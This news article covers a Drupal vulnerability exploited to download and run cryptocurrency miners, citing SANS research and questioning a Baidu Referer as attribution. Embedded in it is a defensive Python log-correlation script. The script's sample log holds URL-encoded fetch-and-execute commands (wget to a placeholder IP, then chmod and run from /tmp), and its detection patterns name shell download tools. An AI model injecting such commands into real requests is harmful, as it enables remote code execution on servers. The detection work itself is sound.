A recently discovered vulnerability in Drupal, a content management system for web servers, has been exploited by hackers on several occasions to mine cryptocurrencies, according to an analysis by a member of the SANS Technology Institute.
One of the most prominent attack vectors was a downloader that would fetch the miner and then start it up.
“This exploit downloads a crypto coin miner and then, in a second attempt, starts it. These three commands are sent as two distinct exploit requests. We have seen a total of 3,814 requests,” wrote Johannes B. Ullrich, dean of research at SANS.
Our own investigation shows that the two IP addresses the miners point to are shared servers, meaning that they host a variety of websites, which might include mining pool services.
The exploit request itself carries Baidu, a popular Chinese search engine, as its Referer, which has been read as a hint that the attacks come from an actor in that country.
It is important to note, however, that the Referer header is supplied entirely by the client, so an attacker can set it to any value at all; a Baidu referrer does not prove that the hackers are Chinese.
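The two points above, the two-request download-then-execute shape Ullrich describes and the untrustworthy Referer, can be turned into a simple log-correlation check. The following is an added example written for this article, not code from SANS or from Cryptovest: it parses constructed web-server access-log lines, groups requests by client IP, and reports any client whose download-style request is followed shortly by an execute-style request. The endpoint, the `cmd` parameter, the stage patterns and the five-minute window are assumptions; the real Drupal payloads are not reproduced here. The Referer is carried along in the report only so an analyst can see it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache/nginx "combined" access-log format. Only the fields used below are
# captured; the referer is the client-supplied Referer header.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Hypothetical stage patterns (assumption: the real Drupal payloads are not
# reproduced here). They only capture the shape Ullrich describes: one
# request fetches the miner, a later one from the same client runs it.
STAGE1 = re.compile(r"\b(wget|curl)\b", re.I)        # fetch the binary
STAGE2 = re.compile(r"\b(chmod|sh|bash)\b", re.I)    # make executable / run
WINDOW = timedelta(minutes=5)   # assumed max gap between the two requests


def parse_line(line):
    """Parse one combined-format line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["decoded"] = unquote(rec["path"])   # match on the decoded query string
    return rec


def find_two_stage_attempts(lines):
    """Group requests by client IP and report every download request that is
    followed within WINDOW by an execute request from the same client.

    The referer is reported only so an analyst can see it; it is set by the
    client and says nothing reliable about where the attacker is.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)

    hits = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            if not STAGE1.search(first["decoded"]):
                continue
            for second in recs[i + 1:]:
                if second["ts"] - first["ts"] > WINDOW:
                    break
                if STAGE2.search(second["decoded"]):
                    hits.append({
                        "ip": ip,
                        "download": first["decoded"],
                        "execute": second["decoded"],
                        "referer": first["referer"],
                    })
                    break
    return hits


# Constructed sample log. Addresses are documentation ranges, the endpoint and
# the "cmd" parameter are hypothetical; only the two-request shape and the
# Baidu referer follow the article.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2018:10:01:02 +0000] '
    '"POST /index.php?cmd=wget%20http%3A%2F%2F198.51.100.9%2Fm%20-O%20%2Ftmp%2Fm HTTP/1.1" '
    '200 512 "https://www.baidu.com/" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Apr/2018:10:01:05 +0000] '
    '"POST /index.php?cmd=chmod%20%2Bx%20%2Ftmp%2Fm%3B%2Ftmp%2Fm HTTP/1.1" '
    '200 512 "https://www.baidu.com/" "Mozilla/5.0"',
    # Same referer, ordinary request: a Baidu referer alone proves nothing.
    '198.51.100.23 - - [13/Apr/2018:10:02:00 +0000] '
    '"GET /node/1 HTTP/1.1" 200 4096 "https://www.baidu.com/" "Mozilla/5.0"',
    # Stage-1-looking request with no follow-up from that client: not reported.
    '192.0.2.44 - - [13/Apr/2018:10:03:00 +0000] '
    '"GET /search?q=wget HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_two_stage_attempts(SAMPLE_LOG):
        print(f"{hit['ip']}: {hit['download']!r} then {hit['execute']!r} "
              f"(referer {hit['referer']!r}, untrusted)")
```

Run against the constructed lines, only 203.0.113.7 is reported: the client that fetched a file and then ran it. The request from 198.51.100.23 carries the same Baidu referer but no payload, which is exactly why the referer is carried through as context and never used as a match condition.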
Last year we saw hackers exploit vulnerabilities in other content management systems, such as WordPress, to mine cryptocurrencies. This is the first time we have seen Drupal hit in the same way.
Perhaps it took this long because Drupal holds only about 4.6% of the content management system market, whereas WordPress accounts for nearly 60% of it.
This mirrors the usual explanation for why far less malware targets macOS than Windows: attackers follow the installed base.
Ullrich also notes that the exploit was written for Drupal 8, although it has also been adapted to work against version 7.
Since the exploit was only discovered last Friday, most websites running the CMS are probably still vulnerable until their operators apply the update. Updating closes the hole but does not remove a miner that is already running, so a site that was exposed should also be checked for unexpected processes and persistence.
This article appeared first on Cryptovest